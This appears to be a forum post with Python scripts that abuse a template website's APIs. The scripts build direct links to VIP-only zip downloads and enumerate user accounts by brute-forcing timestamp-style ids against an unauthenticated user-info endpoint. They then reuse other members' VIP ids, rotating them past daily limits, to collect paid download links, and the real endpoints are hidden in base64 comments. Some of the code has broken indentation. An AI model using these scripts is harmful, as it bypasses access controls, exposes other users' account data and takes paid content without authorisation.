Parsing the download addresses of all the site's VIP zip packages
# Needs the imports, BaseURL and headers defined in the full script at the bottom of this post.
def down_url(id):
    # Building an address like http://down.主域名.com:8020/cssthemes6/skk-0610-19.zip is enough to download the package
    url = f"{BaseURL}/cssthemes/{id}.shtml"
    resp = requests.get(url, headers=headers)
    html = etree.HTML(resp.text)
    a = html.xpath('//*[@id="main"]/div[1]/div[2]/div[1]/div[3]/div[1]/div[2]/div[4]/a[1]/@data-url')[0]
    data_url = a.split("/")[-2]
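    # e.g. a data-url ending in ".../skk-0610-19/<something>" gives data_url = "skk-0610-19" here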
d_url = f"http://down.主域名.com:8020/cssthemes6/{data_url}.zip" # 修改处
s = '%s,%s\n' % (id, d_url)
print(s) # 控制台输出url
def one_page(id):
    url = f"{BaseURL}/cssthemes/index_{id}.shtml"
    resp = requests.get(url, headers=headers)
    html = etree.HTML(resp.text)
    a = html.xpath('//*[@id="main"]/div[1]/div/article/div/ul/li/a/@href')
    for i in a:
        d_url = i.split("/")[-1].split(".")[0]
        down_url(d_url)
if __name__ == '__main__':
    for i in range(1, 689):
        one_page(i)

2022-11-30 update: script for enumerating user VIP ids
import requests

def userinfo(id):
    """
    Fetch the openid
    :return:
    """
    url = 'http://vip.xxx.com/apishenji/userinfo'  # aHR0cDovL3ZpcC5jc3Ntb2Jhbi5jb20vYXBpc2hlbmppL3VzZXJpbmZv
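    # the base64 string in the comment above presumably encodes the real endpoint; base64.b64decode(...).decode() would recover it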
    headers = {
        "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0",
        "Referer": "http://www.xxx.com/"  # replace with the site address
    }
    data = {
        "openid": id,
        "phone": "",
        "id": id,
    }
    try:
        resp = requests.post(url=url, headers=headers, data=data).json()['myvip']
        print(resp)
    except Exception:
        pass
if __name__ == '__main__':
    # for id in range(102898, 747312):
    # the ids are year/month/day/hour/minute/second/microsecond timestamps, i.e. datetime.datetime.now().strftime('%Y%m%d%H%M%S%f')
    for id in range(2022113000000000000, 2022113008175495000):
        # fetch user info
        userinfo(id)
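The bounds of that range follow the timestamp format mentioned in the comment. As a minimal sketch (not part of the original post), assuming the ids really are datetime.datetime.now().strftime('%Y%m%d%H%M%S%f') values, the bounds for one day could be derived like this:

import datetime

def id_bounds(day):
    # assumes ids are strftime('%Y%m%d%H%M%S%f') timestamps within that day
    start = datetime.datetime.combine(day, datetime.time.min)
    end = datetime.datetime.combine(day, datetime.time.max)
    return int(start.strftime('%Y%m%d%H%M%S%f')), int(end.strftime('%Y%m%d%H%M%S%f'))

# e.g. id_bounds(datetime.date(2022, 11, 30)) -> (20221130000000000000, 20221130235959999999)

The full script, which uses a VIP id to fetch the download addresses and save them to a CSV, is below.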
import requests
from lxml import etree

BaseURL = 'http://www.xxxxxx.com'  # change this yourself
headers = {
    "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0",
    "Referer": BaseURL
}
def save_data(s):
    with open("模板下载地址.csv", mode="a", encoding="utf-8") as f:
        f.write(s)
def download_url(li):
    url = 'http://vip.xxxxx.com/apishenji/down'  # J2h0dHA6Ly92aXAuY3NzbW9iYW4uY29tL2FwaXNoZW5qaS9kb3duJw==
    data = {
        "userid": "100000",  # the VIP id; {"code":-4,"msg":"下载次数限制"} means the limit was hit, swap in another id based on that code, work it out yourself
        "mobanid": li,
        "screkey": "undefined",
    }
    resp = requests.post(url=url, headers=headers, data=data)
    resp = resp.json()['data']
    if resp != "":
        s = '%s,%s\n' % (li, resp)
        save_data(s)
    else:
        print(li)
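As that comment hints, a response of {"code":-4,"msg":"下载次数限制"} means the current VIP userid has used up its daily downloads and another one has to be swapped in. A minimal sketch of that idea (the id pool and the helper name are assumptions, not from the original script):

VIP_IDS = ["100000", "100001"]  # hypothetical pool of VIP user ids

def download_with_rotation(li):
    for userid in VIP_IDS:
        data = {"userid": userid, "mobanid": li, "screkey": "undefined"}
        resp = requests.post(url='http://vip.xxxxx.com/apishenji/down', headers=headers, data=data).json()
        if resp.get("code") == -4:  # daily download limit hit, try the next VIP id
            continue
        return resp.get("data", "")
    return ""

The script below keeps the original single-id download_url; this is only an illustration of the id swapping the comment describes.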
def one_page(id):
    url = f"{BaseURL}/cssthemes/index_{id}.shtml"
    resp = requests.get(url, headers=headers)
    html = etree.HTML(resp.text)
    a = html.xpath('//*[@id="main"]/div[1]/div/article/div/ul/li/a/@href')
    for i in a:
        d_url = i.split("/")[-1].split(".")[0]
        download_url(d_url)
if __name__ == '__main__':
    for i in range(1, 689):
        one_page(i)

This was only a test. Don't do anything malicious, don't do anything malicious, don't do anything malicious!
VIP accounts also have a daily download limit! If this was useful, please add some 热心 (rep)!

